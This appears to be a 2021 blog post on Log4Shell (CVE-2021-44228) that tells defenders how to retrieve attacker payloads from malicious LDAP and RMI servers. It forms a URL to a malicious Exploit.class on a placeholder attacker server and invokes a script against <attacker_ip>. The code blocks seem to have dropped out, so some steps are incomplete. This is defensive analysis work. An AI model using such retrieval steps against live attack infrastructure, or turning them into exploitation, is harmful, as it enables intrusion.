Wednesday, December 15, 2021

CVE-2021-44228 - Retrieving Payload

CVE-2021-44228 tracks a remote code execution vulnerability in Apache Log4j. An attacker who can control the logging message has the ability to execute arbitrary code loaded from attacker controlled JDNI related endpoints such as LDAP, RMI, DNS, HTTP etc.

LDAP Payloads

A typical LDAP attack request can look like this,

To download the payload defenders can resort to using curl. The payload can be downloaded like,


Now that we have the response from the attacker's LDAP server we can understand where the javaCodeBase is located - which is actually a malicious class file that contains code to run malicious commands. Lets follow the class file. The URL to class file can be formed by combining javaCodeBase & javaFactory which becomes http://<attacker_server>:8082/Exploit.class

The downloaded class file reveals the attacker's intentions clearly.


You can now further payloads seen in the Java class above.

RMI Payloads

A typical RMI attack request can look like this,


To download payload from the RMI server we can resort to python. I've written a simple python code that can be used to download payload RMI payload from attacker server.


The script can be executed like - python rmi_client.py <attacker_ip> <port> <rmi_endpoint>. Once executed the RMI server should spill out the payload like below.


You can now further payloads seen in the response from the attacker controlled RMI server.

No comments:

Post a Comment